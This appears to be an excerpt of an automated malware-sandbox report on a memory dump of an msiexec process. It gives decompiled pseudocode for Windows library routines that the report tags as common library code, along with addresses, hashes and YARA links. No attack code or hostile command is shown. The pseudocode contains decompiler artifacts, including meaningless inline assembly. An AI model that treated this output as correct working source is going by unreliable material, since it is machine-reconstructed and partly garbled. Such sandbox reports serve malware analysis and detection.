                              • Opcode ID: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
                              • Instruction ID: 46f0b79e9de602a52150e59dfd49843cc9b0535ef07c3b7d385b6cb9e73c39e0
                              • Opcode Fuzzy Hash: 526930f6b946f8cfeb939c22e84d6412d581c453cacba063cdf771b90487b0d5
                              • Instruction Fuzzy Hash: 4B514671A08360DFC720DF29C68092ABBE5FB98708F14496EF99587344E7B1F944CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D0B171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 78%
                              			E04D0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4ddf7a8);
				E04D5D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04D5D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04D4D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04D4F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04D5DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04D4B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04D4B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04D4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04D4A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                              0x04d0b171
                              0x04d0b171
                              0x04d0b171
                              0x04d0b171
                              0x04d0b171
                              0x04d0b176
                              0x04d0b17b
                              0x04d0b180
                              0x04d0b186
                              0x04d0b18f
                              0x04d0b198
                              0x04d0b1a4
                              0x04d0b1aa
                              0x04d64802
                              0x04d64802
                              0x04d64805
                              0x04d6480c
                              0x04d6480e
                              0x04d0b1d1
                              0x04d0b1d3
                              0x04d0b1de
                              0x04d0b1de
                              0x04d64817
                              0x04d6481e
                              0x04d64820
                              0x04d64822
                              0x04d64822
                              0x04d64824
                              0x04d64824
                              0x04d6482a
                              0x00000000
                              0x00000000
                              0x04d64835
                              0x04d6483a
                              0x04d6483d
                              0x04d6483f
                              0x04d64842
                              0x04d64842
                              0x04d64842
                              0x04d64846
                              0x04d6484c
                              0x04d6484e
                              0x04d64851
                              0x04d64851
                              0x04d64853
                              0x04d64854
                              0x04d64854
                              0x04d64858
                              0x04d6485a
                              0x04d6485a
                              0x04d6485d
                              0x04d6485f
                              0x04d64861
                              0x04d64861
                              0x04d64866
                              0x04d6486b
                              0x04d6486e
                              0x04d64871
                              0x04d64876
                              0x04d64876
                              0x04d64878
                              0x04d6487b
                              0x04d64884
                              0x04d64884
                              0x00000000
                              0x04d6487d
                              0x04d6487d
                              0x04d64882
                              0x04d64889
                              0x04d64889
                              0x04d6488f
                              0x04d64891
                              0x04d648e0
                              0x04d648e2
                              0x04d648e4
                              0x04d648e4
                              0x04d648e7
                              0x04d648e7
                              0x04d648ed
                              0x04d648f4
                              0x04d648f6
                              0x04d64951
                              0x04d64951
                              0x04d64953
                              0x04d64953
                              0x04d64956
                              0x04d64956
                              0x04d64958
                              0x04d64959
                              0x04d64959
                              0x04d6495d
                              0x04d6495d
                              0x04d6495f
                              0x04d6495f
                              0x04d64965
                              0x04d64969
                              0x04d649ba
                              0x04d649ba
                              0x04d649c1
                              0x04d649c5
                              0x04d649cc
                              0x04d649d4
                              0x04d649d7
                              0x04d649da
                              0x04d649e4
                              0x04d649e5
                              0x04d649f3
                              0x04d64a02
                              0x00000000
                              0x04d64a02
                              0x04d64972
                              0x04d64974
                              0x00000000
                              0x00000000
                              0x04d64976
                              0x04d64979
                              0x04d64982
                              0x04d64983
                              0x04d64984
                              0x04d6498b
                              0x04d6498d
                              0x04d64991
                              0x04d64993
                              0x04d64999
                              0x04d6499d
                              0x04d649a2
                              0x04d649a2
                              0x04d649a2
                              0x04d64999
                              0x04d649ac
                              0x00000000
                              0x04d649b3
                              0x04d648f8
                              0x04d648fe
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d648fe
                              0x04d64895
                              0x04d6489c
                              0x04d648ad
                              0x04d648b2
                              0x04d648b5
                              0x04d648b7
                              0x04d648ba
                              0x04d648bc
                              0x04d648c6
                              0x04d648c6
                              0x04d648cb
                              0x04d648d1
                              0x04d648d4
                              0x04d648d8
                              0x04d648d8
                              0x00000000
                              0x04d648d8
                              0x04d648be
                              0x04d648c0
                              0x00000000
                              0x00000000
                              0x04d648c2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d648c4
                              0x00000000
                              0x04d64882
                              0x04d6487b
                              0x04d64904
                              0x04d64906
                              0x00000000
                              0x00000000
                              0x04d64908
                              0x04d6490e
                              0x00000000
                              0x00000000
                              0x04d64910
                              0x04d64917
                              0x04d64917
                              0x00000000
                              0x04d64917
                              0x04d0b1ba
                              0x04d647f9
                              0x04d647fc
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d647fc
                              0x04d0b1c0
                              0x04d0b1c0
                              0x04d0b1c3
                              0x04d0b1cb
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: _vswprintf_s
                              • String ID:
                              • API String ID: 677850445-0
                              • Opcode ID: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
                              • Instruction ID: 2ed2b74afff38f243c068440465fe05d7ba6de204eff07e7ffde6dbf85e3db5c
                              • Opcode Fuzzy Hash: e54cb70f91b313033c7818e561406acff0824140a86e2a6c944c345d7535766f
                              • Instruction Fuzzy Hash: 6C51E071E002598FEF35CF64C844BAEBBB1FF41714F1081AED85AAB281D770A9458B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D32581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E04D32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t225;
				signed int _t229;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				signed int _t275;
				signed int _t277;
				void* _t288;
				void* _t289;
				signed int _t290;
				unsigned int _t293;
				signed int _t297;
				signed int _t299;
				signed int _t303;
				intOrPtr _t315;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				void* _t339;
				void* _t341;

				_t336 = _t338;
				_t339 = _t338 - 0x4c;
				_v8 =  *0x4dfd360 ^ _t336;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x4dfb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t293 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t275 = 0x48;
				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t324 = 0;
				_v37 = _t313;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L04D24620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t326 = _t50;
							_t313 = _v32;
							 *(_t331 + 0x3c) = _t275;
							_t277 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t313;
							if(_t313 != 0) {
								 *(_t331 + 0x18) = _t326;
								__eflags = _t313 - 0x4df8478;
								 *_t331 = ((0 | _t313 == 0x04df8478) - 0x00000001 & 0xfffffffb) + 7;
								E04D4F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
								_t313 = _v32;
								_t339 = _t339 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E04D939F2(_t326);
									_t313 = _v32;
									_t326 = _t269;
								}
							}
							_t297 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t326 - 2)) = 0;
								goto L32;
							} else {
								_t275 = _t331 + _t277 * 4;
								_v56 = _t275;
								do {
									__eflags = _t313;
									if(_t313 != 0) {
										_t225 =  *(_v60 + _t297 * 4);
										__eflags = _t225;
										if(_t225 == 0) {
											goto L30;
										} else {
											__eflags = _t225 == 5;
											if(_t225 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t275 =  *(_v60 + _t297 * 4);
										 *(_t275 + 0x18) = _t326;
										_t229 =  *(_v60 + _t297 * 4);
										__eflags = _t229 - 8;
										if(_t229 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t229 * 4 +  &M04D32959))) {
												case 0:
													__ax =  *0x4df8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E04D4F3E0(__edi,  *0x4df848c, __ax & 0x0000ffff);
														__eax =  *0x4df8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E04D4F3E0(_t326, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x4df8480 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df8484,  *0x4df8480 & 0x0000ffff);
													__eax =  *0x4df8480 & 0x0000ffff;
													__eax = ( *0x4df8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E04D4F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E04D4F3E0(_t326, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t326 = _t326 + (_t264 >> 1) * 2 + 2;
													__eflags = _t326;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t326 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x4df575c;
													__eflags = __ebx - 0x4df575c;
													if(__ebx != 0x4df575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E04D4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x4df575c;
														} while (__ebx != 0x4df575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x4df8478 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df847c,  *0x4df8478 & 0x0000ffff);
													__eax =  *0x4df8478 & 0x0000ffff;
													__eax = ( *0x4df8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E04D939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x4df6e58 & 0x0000ffff = E04D4F3E0(__edi,  *0x4df6e5c,  *0x4df6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x4df6e58 & 0x0000ffff;
													__eax = ( *0x4df6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t297 = _v16;
													_t313 = _v32;
													L29:
													_t275 = _t275 + 4;
													__eflags = _t275;
													_v56 = _t275;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t297 = _t297 + 1;
									_v16 = _t297;
									__eflags = _t297 - _v48;
								} while (_t297 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t229 =  *(_v60 + _t324 * 4);
						if(_t229 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t229 * 4 +  &M04D32935))) {
							case 0:
								__ax =  *0x4df8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t313 =  &_v64;
								_v80 = E04D32E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x4df8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4df8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E04D1EEF0(0x4df79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E04D1EB70(__ecx, 0x4df79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t203 = _v72;
											__eflags = _t203;
											if(_t203 != 0) {
												L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t203);
											}
											_t204 = _v52;
											__eflags = _t204;
											if(_t204 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
													_t204 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t293 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x4df7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E04D1EB70(__ecx, 0x4df79a0);
										__eax = _v52;
										L36:
										_pop(_t325);
										_pop(_t333);
										__eflags = _v8 ^ _t336;
										_pop(_t276);
										return E04D4B640(_t204, _t276, _v8 ^ _t336, _t313, _t325, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t313 =  &_v36;
									_t273 = E04D32E3E(_t271,  &_v36);
									_t293 = _v36;
									_v76 = _t273;
								}
								if(_t293 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t293;
								}
								goto L14;
							case 6:
								__eax =  *0x4df5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x4df8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x4df8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x4df6e58 & 0x0000ffff;
								__eax = ( *0x4df6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t324 = _t324 + 1;
								if(_t324 >= _v48) {
									goto L16;
								} else {
									_t313 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("rol dword [esi], cl");
					asm("daa");
					asm("rol dword [esi+ebp], cl");
					asm("rol dword [es:esi+eax*2], cl");
					asm("rol dword [es:edi+ebx], cl");
					asm("xlatb");
					asm("xlatb");
					asm("daa");
					asm("rol dword [esi+ebx], cl");
					asm("daa");
					asm("rol dword [eax+ebx*8], cl");
					_t288 = 0x25;
					asm("xlatb");
					_t289 = _t288 - _t313;
					_pop(_t341);
					asm("xlatb");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x4ddff00);
					E04D5D08C(_t289, _t326, _t331);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t290 = _a12;
					__eflags = _t290;
					if(_t290 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t334 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t303 = _t246 * 0xc;
							_v48 = _t303;
							__eflags = _t290 -  *((intOrPtr*)(_t303 + 0x4ce1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E04D4E5C0(_a8,  *((intOrPtr*)(_t303 + 0x4ce1668)), _t290);
									_t341 = _t341 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t334 = E04D851BE(_t290,  *((intOrPtr*)(_v48 + 0x4ce166c)), _a16, _t327, _t334, __eflags, _a20, _a24);
										_v52 = _t334;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t334;
						__eflags = _t334;
						if(_t334 < 0) {
							__eflags = _t334 - 0xc0000100;
							if(_t334 == 0xc0000100) {
								_t299 = _a4;
								__eflags = _t299;
								if(_t299 != 0) {
									_v36 = _t299;
									__eflags =  *_t299 - _t327;
									if( *_t299 == _t327) {
										_t334 = 0xc0000100;
										goto L76;
									} else {
										_t315 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t315 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t299;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t299) {
											__eflags =  *(_t315 + 0x1c);
											if( *(_t315 + 0x1c) == 0) {
												L106:
												_t334 = E04D32AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
												_v32 = _t334;
												__eflags = _t334 - 0xc0000100;
												if(_t334 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t299 = _v36;
													goto L75;
												}
											} else {
												_t251 = E04D16600( *(_t315 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t299 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t334 = E04D32C50(_t299, _a8, _t290, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t334;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04D1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t334 = _a24;
									_t258 = E04D32AE4( &_v36, _a8, _t290, _a16, _a20, _t334);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E04D32C50(_v36, _a8, _t290, _a16, _a20, _t334, 1);
									}
									_v8 = _t327;
									E04D32ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t334;
					}
					L70:
					return E04D5D0D1(_t244);
				}
				L108:
			}


















































                              0x04d32584
                              0x04d32586
                              0x04d32590
                              0x04d32596
                              0x04d32597
                              0x04d32598
                              0x04d32599
                              0x04d3259e
                              0x04d325a4
                              0x04d325a9
                              0x04d325ac
                              0x04d325ae
                              0x04d325b1
                              0x04d325b2
                              0x04d325b5
                              0x04d325b8
                              0x04d325bb
                              0x04d325bc
                              0x04d325bf
                              0x04d325c2
                              0x04d325c5
                              0x04d325c6
                              0x04d325cb
                              0x04d325ce
                              0x04d325d8
                              0x04d325dd
                              0x04d325de
                              0x04d325e1
                              0x04d325e3
                              0x04d325e9
                              0x04d326da
                              0x04d326da
                              0x04d326dd
                              0x04d326e2
                              0x04d75b56
                              0x00000000
                              0x04d326e8
                              0x04d326f9
                              0x04d326fb
                              0x04d326fe
                              0x04d32700
                              0x04d75b60
                              0x00000000
                              0x04d32706
                              0x04d32706
                              0x04d3270a
                              0x04d3270a
                              0x04d3270d
                              0x04d32713
                              0x04d32716
                              0x04d32718
                              0x04d3271c
                              0x04d3271e
                              0x04d75b6c
                              0x04d75b6f
                              0x04d75b7f
                              0x04d75b89
                              0x04d75b8e
                              0x04d75b93
                              0x04d75b96
                              0x04d75b9c
                              0x04d75ba0
                              0x04d75ba3
                              0x04d75bab
                              0x04d75bb0
                              0x04d75bb3
                              0x04d75bb3
                              0x04d75ba3
                              0x04d32724
                              0x04d32726
                              0x04d32729
                              0x04d3272c
                              0x04d3279d
                              0x04d3279d
                              0x04d327a0
                              0x04d327a2
                              0x00000000
                              0x04d3272e
                              0x04d3272e
                              0x04d32731
                              0x04d32734
                              0x04d32734
                              0x04d32736
                              0x04d75bc1
                              0x04d75bc1
                              0x04d75bc4
                              0x00000000
                              0x04d75bca
                              0x04d75bca
                              0x04d75bcd
                              0x00000000
                              0x04d75bd3
                              0x00000000
                              0x04d75bd3
                              0x04d75bcd
                              0x04d3273c
                              0x04d3273c
                              0x04d32742
                              0x04d32747
                              0x04d3274a
                              0x04d3274d
                              0x04d32750
                              0x00000000
                              0x04d32756
                              0x04d32756
                              0x00000000
                              0x04d32902
                              0x04d32908
                              0x04d3290b
                              0x00000000
                              0x04d32911
                              0x04d3291c
                              0x04d32921
                              0x00000000
                              0x04d32921
                              0x00000000
                              0x00000000
                              0x04d32880
                              0x04d32887
                              0x04d3288c
                              0x00000000
                              0x00000000
                              0x04d32805
                              0x04d3280a
                              0x04d32814
                              0x04d32816
                              0x00000000
                              0x00000000
                              0x04d3281e
                              0x04d32821
                              0x04d32823
                              0x00000000
                              0x04d32829
